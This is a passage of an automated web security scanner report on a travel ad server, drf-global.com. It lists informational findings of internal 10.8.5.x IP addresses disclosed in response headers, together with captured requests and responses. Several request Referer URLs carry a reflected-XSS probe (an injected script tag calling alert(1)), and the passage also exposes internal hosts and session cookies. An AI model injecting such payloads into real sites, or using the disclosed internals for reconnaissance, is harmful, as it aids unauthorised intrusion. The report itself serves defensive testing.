GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=67e8ee2c-a9fa-4168-ac97-3cb991cc9c66&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=070143C243016C8EF8F1193AE89C48CB.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4480

function Miwe1() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...

23.42. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=4eb2c783-b726-4b7f-b2eb-92dc1479cddd&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6EC49D47AFF473B50301CAE75DBBA82B.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=0BB8AB8D28C2251561FE46210E602AEC.p0526; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.60
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...

23.43. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyyc880d& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=2DE5AC9EC2A518E2578C74E8A609E3A0.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...

23.44. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyyc880d& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=EFC80F94270639BE94C078280756EC4C.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...

23.45. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
SERVICE_HOST: 10.8.5.55
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...

23.46. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyymm9d4b7& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=EE4DDEE27F1FC0CE4875AF66953B4ADB.p0521

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=DDF80AC4443E4566A1528EFBCE4138AA.p0525; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.59
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...

23.47. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 51092

function DrfUtils() {}

DrfUtils.regexEscape = function(text) {
return text.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
}
DrfUtils.isFFCompat = function() {
   if (document.addEventListener)
...[SNIP]...

23.48. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:19 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 51092

function DrfUtils() {}

DrfUtils.regexEscape = function(text) {
return text.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
}
DrfUtils.isFFCompat = function() {
   if (document.addEventListener)
...[SNIP]...

23.49. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=363DEDDF73A993F4C60B78F29DDE0D70.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 473

DrfCalendar.i18n = {
   shortDayNames: [ "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"],
   dayNames: ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"],
   monthNames: ["Ja
...[SNIP]...

23.50. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=C0501070F6ED78D85CD7AA691728D8A2.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 1995

.drf-aa {background-position:-90px 0px;}
.drf-aavaca {background-position:-180px 0px;}
.drf-agoda {background-position:-270px 0px;}
.drf-aircanada {background-position:-360px 0px;}
.drf-airfare {b
...[SNIP]...

23.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=3123AB1AEF9C18D860BC374089C56E60.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 1995

.drf-aa {background-position:-90px 0px;}
.drf-aavaca {background-position:-180px 0px;}
.drf-agoda {background-position:-270px 0px;}
.drf-aircanada {background-position:-360px 0px;}
.drf-airfare {b
...[SNIP]...

23.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD319AB033A4436E8A201300E0F85D78.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Content-Length: 95623
Connection: close
Content-Type: image/png

...[SNIP]...

23.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE4DDEE27F1FC0CE4875AF66953B4ADB.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Content-Length: 95623
Connection: close
Content-Type: image/png

.PNG
.
...IHDR................-...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

23.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.56

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
